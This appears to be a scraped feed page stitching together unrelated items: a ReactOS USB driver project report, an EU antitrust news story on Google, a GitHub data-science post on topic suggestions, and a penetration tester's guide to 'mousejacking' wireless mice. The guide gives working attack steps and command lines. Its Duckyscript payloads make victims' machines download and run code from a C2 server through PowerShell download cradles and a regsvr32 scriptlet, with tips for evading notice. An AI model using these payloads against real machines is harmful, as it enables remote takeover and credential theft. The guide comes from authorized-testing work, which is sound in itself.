MMIO space is the register space of the controller. Register space in xHCI is divided into 5 segments. Capability registers are at direct offset from the base address. Operational registers are at offsets from operational base which can be calculated from the information given in the documentation. Similarly other bases like runtime base, doorbell base and extended capabilities bases can be calculated. All of these are the hardware component accessible by the software.

Memory address space is the space allocated for the xHCI driver in the Memory (RAM). When the driver is loaded it is allocated some memory which can be used as required. In the memory address space crucial components are Event ring, Command ring, Device contexts and Transfer rings.  Other components are there as support to these i.e., event ring segment table is used to store the locations of the event ring for the hardware to find them. Similarly device context base address array has the addresses to different device contexts.

Rings are circular data structures used by the hardware and software to communicate with each other. Event rings are used by the hardware to notify about different events like device attach, command completion etc., Command ring is used by the driver to send commands to the Controller.  Transfer rings are used to transfer data between computer and the connected devices.

Link to blogs:  https://reactos.org/blog/49141

USB stack

Above diagram shows the USB driver stack in Windows. After deliberation we’ve decided to take the existing usbport driver in ReactOS and implement xHCI driver below it. Due to this all the functions needed to communicate with usbport remained same as in ehci.

After stable empty driver was created then I started working on the functions. Starting the controller was the first objective. This included many steps like initializing registers with required values. Starting the controller broke down into two parts, initializing hardware and initializing resources. Resources are the data structures in the Memory address space.

In the next phase I worked on generating interrupts. Interrupt mechanism is very different for xHCI compared to older versions, this is detailed in one of my blog posts. It supports MSI interrupt mechanism but the PCI driver present in ReactOS didn’t support that. So I had to go with the traditional interrupt generation mechanism. After some initial implementation interrupts were being generated but after a single interrupt the driver stopped accepting further interrupts.  

To get the driver to accept multiple interrupts many other functions were needed. First to test the interrupt mechanism I’ve sent a Command to check if the controller was processing it and generating interrupt. Here I was stuck for some time as the code seemed to be right but it wasn’t working. Upon debugging we’ve found a typecast issue in the runtime register base address calculation that caused the problem. Once that was cleared up I worked on various functions like GetPortStatus which are required for interrupt processing.

Next major hurdle was continuous call of some functions which we initially thought to be some bug. Later it turned out to be a regular polling mechanism. After that got cleared up and some code optimisation/debugging it started generating interrupts on every connect/ disconnect of the pendrive. In windows 2003 server edition we can see unknown device attached when we connect a pendrive.

Image

In the pre-final week I’ve looked into USB device initialization. This required sending various commands to the controller. Rudimentary implementation of the command and event ring was present from the start. It needed to be refined. So I’ve worked on functions to send commands and receive events and also account for looping of the ring. I’ve tested the rings till they looped and everything was functioning normally.

As a part of final submission I’ve cleaned up the code. Removed commented out code and edited the code to follow reactOS coding style also added licence headers. Upon merging with the trunk there were a few issues that were handled. I’ve modified the stop controller so that the controller can be safely disabled and enabled in the device manager.

Summary:

Driver is now able to successfully start the controller. It generates Port status change events for every disconnect or connect and also generates events on command completion. It generates interrupt if there is any event. It handles any spurious interrupts. It can send commands to the controller and successful completion of valid commands is tested. Both command ring and event ring are capable of handling ring full situations and also ring loop back scenario. Controller can be disabled which successfully stops the controller and re-enabled which essentially resets the driver.  

Next logical step will be to complete USB device initialization. This involves assigning device slot, getting the address, setting up control endpoint etc., Data structures required to do assign device slot and functions to get the address are ready. Once the device slot is assigned the first operation that driver performs on the USB device is to set an address. This is done using the command ring. After that it moves forward to Device Configuration phase for which we need control endpoint. Hence first QueryEndpointRequirements function should be dealt with. After that OpenEndpoint function should be written.  

As the control transfer is done using ring mechanism and code for command/event ring is working we can just port it to make transfer ring function. After all the required functions are ready we can initialise the USB device and get its description using control transfer.  There are other minor tasks that should be worked on later like all the ring structures can actually be expanded as per the specification but for now we’ve decided to make them static. That can be altered later without affecting the main code as the structures are set up for it.  All of these are short term future work.

In the long run a lot more needs to be implemented. All the transfer types i.e., Control transfer, Bulk Transfer, Isoch transfer etc., Also functions to handle slot management and to handle older usb types should be worked on.


Google to Comply with EU Search Demands to Avoid More Fines

$
0
0

Google will comply with Europe’s demands to change the way it runs its shopping search service, a rare instance of the internet giant bowing to regulatory pressure to avoid more fines.

The Alphabet Inc. unit faced a Tuesday deadline to tell the European Union how it planned to follow an order to stop discriminating against rival shopping search services in the region. A Google spokeswoman said it is sharing that plan with regulators before the deadline expires, but declined to comment further.

The EU fined Google a record 2.4 billion euros ($2.7 billion) in late June for breaking antitrust rules by skewing its general search results to unfairly favor its own shopping service over rival sites. The company had 60 days to propose how it would "stop its illegal content" and 90 days to make changes to how the company displays shopping results when users search for a product. Those changes need to be put in place by Sept. 28 to stave off a risk that the EU could fine the company 5 percent of daily revenue for each day it fails to comply.

"The obligation to comply is fully Google’s responsibility," the European Commission said in an emailed statement, without elaborating on what the company must do to comply.

The onus is on Google to find a solution that satisfies regulators, who’ve learned from past battles with Microsoft Corp. and Intel. Corp. Microsoft’s failure to obey a 2004 antitrust order and charge reasonable fees for software licenses saw it fined 899 million euros four years later. Microsoft argued that its prices were fair and it shouldn’t be compelled to give away patented innovation.

‘Mystified’ Lawyer

Intel’s lawyer said in 2009 that he was "mystified" as to what regulators wanted the company to do to comply with an order to halt anti-competitive rebates for chip sales to computer makers. Intel may finally receive clarity when the EU’s top court rules on its legal challenge to a 1.06 billion euro fine on Sept. 6.

Google has the option of challenging the fine and the antitrust order to the EU courts, which can take years to reach a final decision. Next week’s Intel ruling will come some eight years after the EU fine. Google would have to comply with the order ahead of any final decision from EU judges.

The EU now has a month to check if Google’s planned changes will fit the bill. Regulators are also expected to levy fines in separate investigations into Google’s Android mobile-phone software -- possibly as soon as next month -- and the AdSense advertising service. Margrethe Vestager, the EU’s antitrust chief, has also threatened further probes on travel or map services.

Regulators sought technical help in June to evaluate how Google complies with the order, setting a budget of up to 10 million euros to pay for experts in search engine optimization and search engine marketing.

ICOMP, a coalition of technology and media companies, called for Google’s offer to be made public and for the EU to publish details of how the company breached antitrust law.

"These affect everyone in the online and mobile worlds so they must be made public for evaluation," ICOMP’s Michael Weber said in a blog posting.

Mouse to RAT: vulnerabilities in most of the Logitech Unifying dongle devices

$
0
0

Hostile Airwaves: Mousejacking

On internal engagements, poisoning name resolution requests on the local network (à la Responder) is one of the tried and true methods of obtaining that coveted set of initial Domain credentials.  While this approach has worked on many clients (and has even given up Domain Admin in less time than it takes to grab lunch), what if Link Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NTB-NS) protocols are configured securely or disabled?  Or, what if Responder was so successful that you now want to prove other means of gaining that initial foothold?  Let’s explore…

PROTIP: Always prove multiple means of access whenever possible during engagements!

There are a multitude of attacks a penetration tester can leverage when conducting physical walkthroughs of client spaces.  One of the more interesting, and giggle-inducing, involves exploiting wireless peripherals.  This technique, known as “mousejacking”, gained some notoriety in early 2016 when Bastille, a firm specializing in wireless and Internet of Things (IoT) threat detection, released a whitepaper documenting the issue.  At a high-level, the attack involves exploiting vulnerable 2.4 GHz input devices by injecting malicious keystrokes (even if the target is only using a wireless mouse) into the associated USB dongle.  This is made possible because many wireless mice (and a handful of keyboards) either don’t use encryption between the device and its paired USB dongle, or will accept rogue keystrokes even if encryption is being utilized.  WIRELESS WHOOPSIE!

You Vulnerable, Bro?

At this point, you are probably wondering which input devices are vulnerable.  While a more comprehensive list can be found on Bastille’s website, I’ve personally had the most experience with Microsoft and Logitech products while on engagements.

Vulnerable Microsoft products include, and most certainly aren’t limited to, the following devices:

With Logitech, devices that are likely to be affected are ones that leverage the “Unifying” dongle, which is meant to work with a large number of wireless input devices the company produces.  The dongle can be easily identified by an orange star printed on the hardware:


Have Your Hardware Handy

To help us conduct our mousejacking attack, we need to first acquire SeeedStudio’s Crazyradio PA USB dongle and antenna.  This is a ~$30 long-range 2.4 GHz wireless transmitter (which uses the same series of transceiver, Nordic Semiconductor’s nRF24L, that many of the vulnerable devices leverage) that is intended for use on hobby drones; however, we are going to flash the firmware (courtesy of Bastille) to weaponize it for our own nefarious purposes.  *EVIL CACKLE*  This new firmware will allow the dongle to act promiscuously, adding packet sniffing and injection capabilities.  Once the Crazyradio PA is in hand, the instructions for setting it up with new firmware can be found here.

It is also helpful to have one or more known vulnerable devices on hand to leverage for testing.  In my personal lab, I am utilizing Logitech’s m510 Wireless Mini Mouse and Microsoft’s Wireless Mobile Mouse 4000.

JackIt In The Office (But Don’t Get Caught…)

The software of choice for this scenario is going to be JackIt, a python script written by phiksun (@phikshun) and infamy (@meshmeld).  The project leverages the work of Bastille and simplifies both identification of devices and the attack delivery.  Using Kali, or your distribution of choice, go ahead and  grab the script:

$ git clone https://github.com/insecurityofthings/jackit.git /opt/

Take a gander at the README.md file and follow the instructions to install JackIt.  Once that is completed, ensure that the flashed Crazyradio PA dongle is plugged in prior to starting up the tool.  Failure to do so will cause JackIt to throw an error.  Let’s start by running JackIt without any arguments, which will put the tool into reconnaissance mode, allowing you to see what wireless input devices are in range:

/opt/jackit/$ ./jackit.py

Take a few moments to inspect JackIt’s output before continuing:

When a device is discovered, a new row is created with a number assigned in the KEY column based on order of initial appearance.  You will need to reference this number when targeting a particular device (more on that shortly).  The ADDRESS column shows the hardware MAC address for the wireless device.  This can be useful when determining whether you’ve previously seen / targeted a particular device (JackIt does not keep track of your previously targeted devices, so when working with multiple devices, you’ll need to keep track of them yourself).  The TYPE column displays the brand of the device once enough packets are captured by JackIt to accurately identify.  Note that in the screenshot above that the second device (KEY 2) has not been adequately fingerprinted yet.

WARNING: You cannot successfully target a device without the TYPE column populated.

The COUNT and SEEN columns relate to wireless communication detected between a device and its dongle.  COUNT refers to the number of times communication between the device and dongle were picked up by the Crazyradio PA.  SEEN informs us how many seconds have passed since the last communication was detected.  Devices that haven’t been detected in a while are either a) not being actively used at the moment or b) no longer in range.  With the former, there is a potential that the user has locked their computer and stepped away.  In either case, these are probably not ideal targets.

The CHANNELS column notates the channel(s) that the wireless peripheral and dongle are utilizing to communicate.  Lastly, PACKET shows the contents of the last captured communication.  For our purposes, we can ignore these two column(s).

To actually exploit devices that are discovered, JackIt will need to know what malicious keystrokes to send to a victim.  The tool takes commands in Ducky Script format, the syntax leveraged by the Rubber Ducky, a keystroke-injecting USB thumb drive created by Hak5.  Whereas a Rubber Ducky requires Duckyscript to be encoded prior to being used for exploitation, this is not the case for JackIt… simply pass the “plaintext” commands in a text file.  If you are unfamiliar with Duckyscript, please refer to Hak5’s readme page to get your learn on.

A recommended starting point for a Duckyscript mousejacking template can be found below.  Given that it may be possible for a user to see a mousejacking attempt in progress, an attempt has been made to streamline the attack as much as possible without sacrificing accuracy.  DELAY times are much shorter than with traditional Rubber Ducky scripts as there is no need to wait for driver installation since we are not physically plugging a USB device into the victim’s machine.  In addition to keeping the DELAY values low, it is also helpful to shorten the actual attack payload as much as possible.  The reason here is twofold, less keystrokes means less time to send characters to the victim (each keystroke is literally “typed” out on the target and can draw attention to the attack) as well as lessening the chance of any data-in-transit issues (wireless attacks can be unstable, with possible lost or malformed characters).  We will discuss these types of issues in greater detail later on.

GUI r
DELAY 300
STRING ***INSERT MALICIOUS PAYLOAD HERE***
DELAY 300
ENTER
ENTER

Using the script above, JackIt would open the Windows “run” prompt, pause briefly, pass whatever malicious payload we specify, pause briefly, then submit the command.  To give you an idea of the speed of keystroke injection as well as user’s visibility of active mousejacking attack, I have recorded a clip of sending a string of character’s to a victim’s machine using the above template:

As you can see, even though we have taken steps to steamline the attack, there is still a window (no pun intended, I promise!) in which a user could be alerted to our activities.

Note:  If the keystrokes injected had been calling a valid program such as powershell.exe, the window would have closed at the end of the injection once the program had executed.  In this case, the submitted run prompt window popped back up and highlighted the text when it was unable to properly process the command.

From Mouse To RAT

Next stop, Exploitation Station!  For most scenarios, there will be a minimum of two machines required.  The “attack” machine will have the Crazyradio PA dongle attached and JackIt running.  The operator of this machine will walk near or through the target’s physical workspace in order to pick up wireless input devices in use.  Any payloads submitted by this machine will direct the victims to reach out to the second machine which is hosting the command & control (C2) server that is either sitting somewhere on the client’s internal network or up in the cloud.

So, what malicious payload should we use?  PowerShell one-liners that can deliver remotely hosted payloads are a great starting point.  The Metasploit Framework has a module (exploit/multi/script/web_delivery) built specifically for this purpose.

Let’s take a look at the Web Delivery module’s options:

Note the default exploit target value is set to Python.  To leverage PowerShell as the delivery mechanism we will need to run SET TARGET 2.  This will ensure our generated payload uses the PowerShell download cradle pentesters and malicious actors have come to love!  In most cases, we will want to set both SRVHOST and LHOST to point to the machine running the Web Delivery module, which is acting as the C2 server.  SRVPORT will set the port for hosting the malicious payload while LPORT sets the port for the payload handler.  While it is usually recommended that you use a stageless payload (such as windows/meterpreter_reverse_https) whenever possible in an attempt to increase the chance of successfully bypassing any anti-virus solutions that may be in place, attempting to do so with the Web Delivery module will result in an error.  This is due to the payload exceeding Window’s command line limit of approximately 8192 characters (Cobalt Strike payloads bypass this limitation through compression, but that’s another deep dive altogether).  Given this limitation, let’s use a staged payload instead: windows/meterpreter/reverse_https.  Lastly, let’s set the URIPATH to something short and sweet (/a) to avoid Metasploit generating a random multi-character string for us.  Once everything is set up, the module’s options should look similar to the following:

Let’s go ahead and run the module to generate our PowerShell one-liner and start our payload handler:

As mentioned previously, the preference for this type of attack is to have as short of a string as possible.  What the Web Delivery module generates is a little longer than I like for most mousejacking attempts:

powershell.exe -nop -w hidden -c $v=new-object net.webclient;$v.proxy=[Net.WebRequest]::GetSystemWebProxy();$v.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $v.downloadstring('http://192.168.2.10/a');

This doesn’t look like a vanilla PowerShell download cradle, does it?  The module generates a random variable ($v in this example) and uses that to obfuscate the cradle in order to bypass some defenses.   Additionally, there are commands that make the cradle proxy-aware which might assist in the payload successfully calling out to the Internet (potentially helpful if your C2 server resides in the cloud).

We can certainly shorten this payload and have it still work, but we have to consider the benefits vs. tradeoffs of doing so.  If our C2 server is internal to the client’s network, we can remove the proxy-related commands and still leave some obfuscation of the cradle intact.  Or, if we are looking for the absolutely shortest string, we can remove all obfuscation and restore a more standard-looking download cradle.  It ultimately comes down to evading user detection vs. evading host-based protections.  Below are examples of each modification:

powershell.exe -nop -w hidden -c $v=new-object net.webclient;IEX $v.downloadstring('http://192.168.2.10/a');

powershell.exe -nop -w hidden -c IEX(new-object net.webclient).downloadstring('http://192.168.2.10/a');
PROTIP: If you’re interested in PowerShell obfuscation techniques, check out the work of @danielhbohannon!

Now that we’ve set up our C2 server and have our malicious string in place, we can modify the Duckyscript template from earlier, making sure to save it locally:

GUI r
DELAY 300
STRING powershell.exe -nop -w hidden -c IEX(new-object net.webclient).downloadstring('http://192.168.2.10/a');
DELAY 300
ENTER
ENTER

To use JackIt for exploitation vs. reconnaissance, simply call the Duckyscript file with the --script flag:

/opt/jackit/$ ./jackit.py --script ducky-script.txt

In the screenshot below, we can see that we have discovered two wireless peripherals that have been fingerprinted by JackIt.  When we are ready to launch our mousejack attack, simply press CTRL-C:

We can select an individual device, multiple devices, or simply go after all that were discovered.  Once we’ve made our selection and hit ENTER,  our specified attack will launch.  Depending on the brand of device targeted, you may see many 10ms add delay messages on your screen before the completion of the script.  You’ll know that JackIt has finished when you see the following message:  [+] All attacks completed.

Let’s take a look at our Web Delivery module and see if any of the attacks were successful:

Looks like we got a hit!  While we had attempted to mousejack two targets, only one successfully called back.  There are several reasons why a mousejacking attempt might fail and we will discuss those shortly.

So, we’ve now successfully used Metasploit’s Web Delivery module in conjunction with JackIt to compromise a wireless peripheral.  There are other frameworks we can utilize that offer similar PowerShell one-liners, including Cobalt Strike and Empire.  Let’s briefly talk about Cobalt Strike, since there is a non-PowerShell payload that I like to use for mousejacking.

Cobalt Strike has an attack called Scripted Web Delivery, which is similar to Metasploit’s Web Delivery, but offers more payload options.  While there is a PowerShell option available, I am partial to the regsvr32 payload as it’s short and sweet; however, this does require Microsoft Office to be installed on the target system as it leverages Visual Basic for Applications (VBA) macros and Component Object Model (COM) scriptlets:

The payload looks similar to the following once everything is configured:

regsvr32 /u /n /s /i:http://192.168.2.10:80/a scrobj.dll

How this payload works is outside the scope of this article, but if you’re interested in learning more, please check out Casey Smith’s (@subTee) blog post.

Before we continue, I want to mention that I’ve had issues starting up JackIt again after a successful attack, receiving an error message like the one below:

I’ve been able to reproduce this error on Kali running within VMWare as well as a standalone Kali box.  Let me know if you experience this phenomenon on other flavors of Linux.  The only way to get around this error other than restarting the operating system is to unbind and then rebind the USB drivers for the CrazyRadio PA  dongle.  This can be achieved by unplugging and then replugging in the CrazyRadio PA or by issuing some specific commands via the console.  Luckily for you, my awesome coworker Dan Astor (@illegitimateDA), wrote a Bash script to do all that magic for you.  Just simply run the following script whenever the error message shows its ugly face and then rerun JackIt:

#!/bin/bash

#Tool :: USB device reset script developed for use with JackIt & CrazyRadio PA USB Adapter
#Author :: Dan Astor (@illegitimateDA)
#Usage :: After running an attack with JackIt, run the script to reset the USB adapter. This will fix the USB Core Error Python throws.

#Unbind USB devices from the system and rebind them
for device in /sys/bus/pci/drivers/uhci_hcd/*:*; do
     #Unbind the device
     echo "${device##*/}" > "${device%/*}/unbind"
     #Bind the device
     echo "${device##*/}" > "${device%/*}/bind"
done

I Was Told There Would Be Shells…

So, here we are, owning and pwning unsuspecting victims who fail to know the danger in the dongle. But, what if all doesn’t go according to plan? What if we unleash an attack on multiple peripherals only to discover that there are no shells waiting for us? THE HORROR!

First things first: let’s discuss range. Quite honestly, the antenna that comes with the CrazyRadio PA isn’t an amazing performer despite the dongle being advertised as “long-range.” It only takes one missing or malformed character in our attack string to rain on our pwnage parade.  I’ve seen missing characters on more than one occasion and have even witnessed run prompts that have endless string of forward slashes that prevent the run prompt from closing, leaving the user no choice but to reboot the affected computer.  These situations are not desirable as we don’t receive shells (BOO!), users are potentially alerted to our attacks (BOO TIMES TWO!), and we may even negatively affect the productivity of our client’s employees (CLIENT RAGE!).  Based on my experience, I believe many of these issues can be avoided by improving signal strength.  I’ve had some luck with powerful Alfa antennas, such as the 9dBi Wifi Booster. The only issue with this particular choice is that one tends to draw a lot of attention walking around with a 15″ antenna sticking out of the side of a laptop. 😛 My advice: experiment with different options and find one that you find reliable at the greatest range.

Second thing to note: Microsoft wireless devices can be tricky little buggers to target.  This is because unlike Logitech peripherals, Microsoft utilizes sequence numbers for every communication between device and dongle.  JackIt monitors the sequence numbers but if the user performs some action (clicks a button, moves the mouse, etc.) before the attack is delivered, the sequence numbers will no longer align and we will once again find ourselves with missing or malformed characters.  While sometimes difficult to pull off, I prefer to have “eyes on” a target if they are using a Microsoft peripheral in order to figure out the ideal time to launch the attack.  If I’m completely blind and have both Microsoft and Logitech devices in range, I tend to err on the side of caution and target a Logitech device.

Third consideration: how we choose to construct the URL that points to our payload matters.  I found this out the hard way on a recent engagement.  Leveraging Cobalt Strike, I had hosting a payload with a URL similar to the examples presented earlier in this post (http://ip_address/a).  After launching an attack on a promising target, I discovered that there was no shell waiting for me on the C2 server.  Upon inspecting Cobalt Strike’s Web Log, I saw a message similar to the following:

This was perplexing; why did my target attempt to reach an URL ending in a capital /A?  Had a somehow mistyped the attack string in my DuckyScript file?  After a quick check, this was ruled out.  Then, it hit me… the user must have had CAPS LOCK enabled!  I was shell-blocked by something so stupid!  Ever since that engagement, I leverage numbers (i.e. /1)  in my mousejacking URLs to prevent similar issues in the future.

Lastly, there are some remediation actions that the client may have taken.  Which brings us to…

What’s A Poor Dongle To Do?

The easiest solution to the problem of mousejacking is relatively obvious: stick to wired peripherals (or migrate to Bluetooth).  That being said, both Microsoft and Logitech have attempted mitigation strategies for their affected products if you are absolutely in love with your 2.4 GHz device.

Microsoft released a Security Advisory in April 2016 with a corresponding optional update.  The update attempts to add more robust filtering at the dongle so that rogue keystrokes are detected and properly discarded.  Researchers who have tested the update say it’s relatively “hit or miss”, with some devices remaining vulnerable even after the patch is applied.

Logitech has taken a different approach, requiring users to manually apply a firmware update in order to remedy the issue.  It’s a multi-step procedure that may prove difficult for less technical end users to apply or too cumbersome for IT departments to handle a massive manual update across the entire user population.

Given these facts, I have a feeling that we will be finding mousejack-able devices within enterprises for a while to come.  If within the scope of your engagement, consider adding mousejacking to your toolbox of destruction!

Topic Suggestions for Millions of Repositories

$
0
0

We recently launched Topics, a new feature that lets you tag your repositories with descriptive words or phrases, making it easy to discover projects and explore GitHub.com. Topic suggestions on public repositories, provides a quick way to add tags to repositories.

image

These suggestions are the result of recent data science work at GitHub. We applied concepts from text mining, natural language processing (NLP), and machine learning to build a topic extraction framework.

Because Topics is a brand new concept at GitHub, we started with no cues from users on what defined a topic and what type of topics they would typically add to their repositories. Given our focus on improving discoverability, internally we defined Topics as any “word or phrase that roughly describes the purpose of a repository and the type of content it encapsulates”. These can be words such as “data science”, “nlp”, “scikit-learn”, “clustering algorithm”, “jekyll plugin”, “css template”, or “python”.

While no tag or label-type feature existed prior to the start of this project, we did have a rich set of textual information to start from. At its core, GitHub is a platform for sharing software with other people, and some of the data typically found in a repository provides information to humans rather than instructions for computers. Repository names, descriptions, and READMEs are text that communicate functionality, use case, and features to human readers. That’s where we started.

We developed a topic extraction framework, called repo-topix, to learn from the human-readable text that users provide in repo names, descriptions, and READMEs written by developers about their projects by incorporating methods from text mining, NLP, and supervised machine learning. At a high level, repo-topix does three things:

  1. Generates candidate topics from natural language text by incorporating data from millions of other repositories
  2. Selects the best topics from the set of candidates
  3. Finds similarities and relationships in topics to facilitate discoverability

Below, we describe each step of the repo-topix framework in greater technical detail.

flow

Generating candidate topics from natural language text

Preprocessing of READMEs

While README files within GitHub.com tend to be formatted using Markdown and reStructuredText with fairly lightweight formatting, there are certain sections such as code blocks, tables, and image links that are not useful for topic suggestions. For example, month names from within a table would not be useful to a user.

To extract text sections of interest, we developed a heuristics-based README tagger that marks sections in the README file as relevant or non-relevant. This simple tagger uses common formatting cues such as indentation, spacing, and use of backticks to determine “noise sections” and “valid text sections”. The use of a grammar-based parser was unnecessary as we only care about useful text sections and regard everything else in a README as noise.

Once we extract text sections of interest, we perform basic cleanup to remove file extensions, HTML tags, paths, and hosts from further processing, as these are more distracting than useful. Finally, the remaining text gets segmented into coarse-grained units using punctuation marks as well as README section markers such as contiguous hash symbols.

Finding candidate topics

We use the cleaned text from the previous step to generate candidate topics by eliminating low-information words and breaking the remaining text into strings of one or multiple consecutive words, called n-grams. Like any text, our sources contain many words that are so common that they do not contain distinguishing information. Called stop words, these typically include determiners like “is”, “the”, “are”, conjunctions like “and,”, “but”, and “yet”, and so on. Given our specialized domain, we created a custom stop word list that included words that are practically ubiquitous in our source text; for example, “push”, “pull”, “software”, “tool”, “var”, “val”, and “package.” The custom stop word list provides an efficient way to finding potential topics, as we simply take the resulting phrases left between eliminated words. For example, “this open source software is used for web scraping and search” produces three candidate topics: 1. “open source,” 2. “web scraping,” 3. “search”. This process eliminates the need for brute-force n-gram generation which could end up producing a large number of n-grams depending the length of the README files being processed. After testing internally among GitHub staff, we found that n-grams made up of many words tended to be too specific (e.g. “machine-learning-tutorial-part-1-intro”), so we limit candidate topics to n-grams of size 4 or less.

Selecting best topics

Eliminating low quality topics

While some of the generated word units in the previous step would be meaningful as topics, some could also be plain noise. We have a few strategies for pruning noise and unpromising candidate topics. The first is simply to eliminate phrases with low frequency counts. For example, if we had the following candidates with their corresponding counts, we could eliminate some of the low frequency topics:

machine learning tutorial part 1 (1)
machine learning (5)
beginners data science course (1)
topic modeling (3)

From the above, we could easily eliminate topics that don’t satisfy a minimum frequency count threshold. However, this method doesn’t prune out topics with unwanted grammatical structure or word composition. For example, words and phrases like “great”, “cool”, “running slowly”, “performing operations”, “install database” and “@kavgan” (a GitHub handle) are not great topics for a repository. To aggressively prune out these keywords, we developed a supervised logistic regression model, trained to classify a topic as “good” (positive) or “bad” (negative). We call this the keyword filtering model. We manually gathered about 300 training examples balanced across the positive (good topics) and negative (bad topics) categories. Because of this manual process with no input from users, our training data is actually fairly small. While it’s possible to learn from the actual words that make up a topic when you have a very large training set, with limited training data we used features that draw on the meta-information of the training examples so that our model does not just memorize specific words. For instance, one of the features we used was the part-of-speech usage within topics. If the model learns that single word verbs are often considered bad topics, the next time it sees such an occurrence, it would help eliminate such words from further consideration. Other features we used were occurrence of user names, n-gram size of a phrase, length of a phrase, and numeric content within a phrase. Our classifier is tuned for high recall in order to keep as many phrases as possible and prune obviously incorrect ones.

With time, we plan to include feedback from users to update the keyword filtering model. For example, highly accepted topics can serve as positive training examples and highly rejected topics can either be used as stop words or used as negative examples in our model. We believe that this incremental update would help weed out uninteresting topics from the suggestions list.

Scoring candidate topics

Instead of treating all remaining candidate topics with equal importance, we rank the candidates by score to return only the top-N promising topics instead of a large list of arbitrary topics. We experimented with several scoring schemes. The first scoring approach measures the average strength of association of words in a phrase using pointwise mutual information (PMI) weighted by the frequency count of the phrases. The second approach we tried uses the average tf-idf scores of individual words in a phrase weighted by the phrase frequency (if it’s more than one word long) and n-gram size.

We found that the first scoring strategy favored topics that were unique in nature because of the way PMI works when data is fairly sparse: unique phrases tend to get very high scores. While some highly unique phrases can be interesting, some unique phrases can just be typos or even code snippets that were not formatted as code. The second approach favored phrases that were less unique and relatively frequent. We ended up using the tf-idf based scoring as it gave us a good balance between uniqueness of a topic and relevance of a topic to a repository. While our tf (term frequency) scoring is based on local counts, our idf (inverse document frequency) weighting is based on a large dictionary of idf scores built using the unstructured content from millions of public READMEs. The idf weights essentially tell us how common or unique a term is globally. The intuition is that the more common a term, the less information it carries and should thus have a lower weight. For example, in the GitHub domain, the term “application” is much more common than terms such as “machine”, “learning”, or “assignment” and this is clearly reflected by their idf weights as shown below:

wordidf
application4.300
machine7.169
learning7.818
assignment8.480

If a phrase has many words with low idf weighting, then its overall score should be lower compared to a phrase with more significant words - this is the intuition behind our tf-idf scoring strategy. As an example, assuming that the normalized tf of each word above is 0.5, the average tf-idf score for “machine-learning-application” would be 3.21 and the average tf-idf score for “machine-learning-assignment” would be 3.91. The former has a lower score because the term “application” is more ubiquitous and has a lower idf score than the term “assignment”.

In addition to the base tf-idf scoring, we are also experimenting with some additional ideas such as boosting scores of those phrases that tend to occur earlier in a document and aren’t unique to a few repositories. These minor tweaks are subject to change based on our internal evaluation.

Discovering similar topics

Canonicalizing topics to address character level topic differences and inflections

Because different users can express similar phrases in different ways, the generated topics can also vary from repository to repository. For example, we have commonly seen these variation of topics with different repositories:

neural-network
neural-networks
neuralnetwork
neuralnetworks
topic-models
topic-modelling
topic-modeling
topicmodel
topicmodeling
machinelearning-algorithms
machine-learning-algorithm

To keep topic suggestions fairly consistent, we use a dictionary to canonicalize suggested topics. Instead of suggesting the original topics discovered, we suggest a canonicalized version of the topic if present in our dictionary. This in-house dictionary was built using all non-canonicalized topics across public repositories. The non-canonicalized topics give us cues as to which topics are most commonly used and which ones can be grouped together as being equivalent. We currently use a combination of edit-distance, stemming, and word-level Jaccard similarity to group similar topics together. Jaccard similarity in our case estimates how similar two phrases are by comparing members of two sets to see which members are shared and which are distinct. With this, phrases that share many words can be grouped together.

Near similar topics

While it’s possible to suggest all top-scoring topics, some topics may be fairly repetitive, and the set of topics returned may not provide enough variety for labeling a repository. For example, the following top-scoring topics (from an actual repository), while valid and meaningful, are not interesting and lack variety as it captures different granularity of similar topics:

machine learning
deep learning
general-purpose machine learning
machine learning library
machine learning algorithms
distributed machine learning
machine learning framework
deep learning library
support vector machine
linear regression

We use a greedy topic selection strategy that starts with the highest-scoring topic. If the topic is similar to other lower-scoring topics, the lower-scoring topics are dropped from consideration. We repeat this process iteratively using the next highest-scoring topic until all candidate topics have been accounted for. For the example above, the final set of topics returned to the user would be as follows:

machine learning
deep learning
support vector machine
linear regression

We use word-level Jaccard similarity when computing similarity between phrases, because it’s known to work well for short phrases. It also produces a score between 0-1, making it easy to set thresholds.

Evaluation

As topic labels were not available during the development of repo-topix, we needed to get a rough approximation of how well the suggested topics describe a repository. For this rough approximation, we used the description text for repositories since descriptions often provide insights into the function of a repository. If indeed the auto-suggested topics are not completely arbitrary, there should be some amount of overlap between suggested topics and the description field. For this evaluation, we computed ROUGE-1 precision and recall. ROUGE is an n-gram overlap metric that counts the number of overlapping units between a system summary (suggested topics in our case) and a gold standard summary (description in our case). We performed this evaluation on roughly 127,000 public repositories with fairly long descriptions. These are our most recent results:

Repos with no topic suggestions: ~28%
Average ROUGE-1 Recall: 0.259
Average ROUGE-1 Precision: 0.372
F-Measure: 0.306

The ROUGE recall above tells us quantitatively how much of the description is being captured by topic suggestions and precision tells us what proportion of the suggestion words are words that are also in the description. Based on the results we see that there is some overlap as expected. We’re not looking for perfect overlap, but some level of overlap after disregarding all stop words.

Our topics extraction framework is capable of discovering promising topics for any public repository on GitHub.com. Instead of applying heavy NLP and complex parsing algorithms within our framework (e.g. grammar-based markdown parsing, dependency parsing, chunking, lemmatization), we focused on using lightweight methods that would easily scale as GitHub.com’s repository base grows over the years. For many of our tasks, we leverage the volume in available data to build out reusable dictionaries such as the IDF dictionary, which was built using all public README files, a custom stop-word list, and a canonicalization dictionary for topics. While we currently depend on the presence of README files to generate suggestions, in the future we hope to make suggestions by looking at any available content within a repository. Most of the core topics extraction code was developed using Java and Python within the Spark framework.

Our plan for the near future is to evaluate the usage of suggested topics as well as manually created topics to continuously improve suggestions shown to users. Some of the rejected topics could feed into our topics extraction framework as stop words or as negative examples to our keyword filtering model. Highly accepted topics could add positive examples to our keyword filtering model and also provide lessons on the type of topics that users care about. This would provide cues as to what type of “meta-information” users add to their repositories in addition to the descriptive terms found within README files. We also plan to explore topic suggestions on private repositories and with GitHub Enterprise in a way that fully respects privacy concerns and eliminates certain data dependencies.

Beyond these near term goals, our vision for using topics is to build an ever-evolving GitHub knowledge graph containing concepts and mapping how they relate to each other and to the code, people, and projects on GitHub.

These are references to some of the libraries that we used:

Want to work on interesting problems like code analysis, social network analysis, recommendations engine and improving search relevance? Apply here!

  • Kavita Ganesan, @kavgan, Senior Data Scientist - Machine Learning
  • Rafer Hazen, @rafer, Engineering Manager - Data Engineering
  • Frances Zlotnick, @franniez, Senior Data Scientist - Analytics

PaxosStore: A Distributed-Database Inspired by Google MegaStore

$
0
0

README.md

